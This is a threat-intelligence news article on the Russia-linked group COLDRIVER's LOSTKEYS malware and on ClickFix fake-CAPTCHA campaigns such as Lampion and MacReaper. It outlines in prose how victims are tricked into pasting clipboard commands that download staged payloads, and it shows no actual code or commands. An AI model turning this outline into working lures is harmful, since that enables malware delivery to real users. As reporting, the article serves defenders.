COLDRIVER Unleashes ‘LOSTKEYS’ Malware in Sophisticated ClickFix Attacks on Western Targets

The Russia-linked hacking group COLDRIVER—also known as Callisto, Star Blizzard, and UNC4057—has been linked to a new malware variant dubbed LOSTKEYS, used in an ongoing espionage campaign that leverages clever social engineering tactics similar to the ClickFix technique.

According to Google's Threat Intelligence Group (GTIG), LOSTKEYS is designed to exfiltrate sensitive files based on specific file extensions and directories, as well as gather system information and running process data. The malware has been deployed against former and current Western government advisors, journalists, think tanks, NGOs, and individuals tied to Ukraine during attacks observed in January, March, and April 2025.

This marks COLDRIVER’s second known custom malware, following SPICA, and reflects a shift from their traditional credential phishing campaigns toward more tailored malware deployment. Historically, COLDRIVER has focused on stealing account credentials, exfiltrating emails, and pilfering contact lists from compromised systems, occasionally delivering malware to gain deeper access.

The attack begins by luring victims to decoy websites posing as CAPTCHA verification pages. Victims are tricked into opening the Windows Run dialog and pasting a PowerShell command copied to their clipboard—an approach popularized by the ClickFix technique. This command downloads and executes a second-stage payload, which verifies the environment to evade detection and then retrieves a Base64-encoded PowerShell script to launch LOSTKEYS.

Google's researchers also identified older LOSTKEYS artifacts dating back to December 2023, disguised as tools related to the Maltego investigation platform. However, it remains unclear whether those samples were also linked to COLDRIVER or if the malware was repurposed more recently.

The report highlights a broader trend: multiple cybercriminal groups are adopting ClickFix-style techniques to distribute various malware strains. For example, Lampion, a banking trojan, uses phishing emails with ZIP attachments that redirect recipients to fake CAPTCHA pages and employ a multi-stage infection process that masks the malware's activity by fragmenting execution across separate processes.

Another evolving threat combines ClickFix with EtherHiding, a technique that hides next-stage payloads in Binance Smart Chain (BSC) contracts. One such campaign, dubbed MacReaper, uses fake CAPTCHAs to spread the Atomic Stealer macOS malware. Victims are prompted to paste clipboard commands into Terminal, which initiates the download of a signed Mach-O binary.

The MacReaper campaign has reportedly compromised over 2,800 legitimate websites to distribute these malicious CAPTCHA prompts, using techniques like obfuscated JavaScript, full-screen iframes, and blockchain-based command infrastructure to evade detection and maximize infections.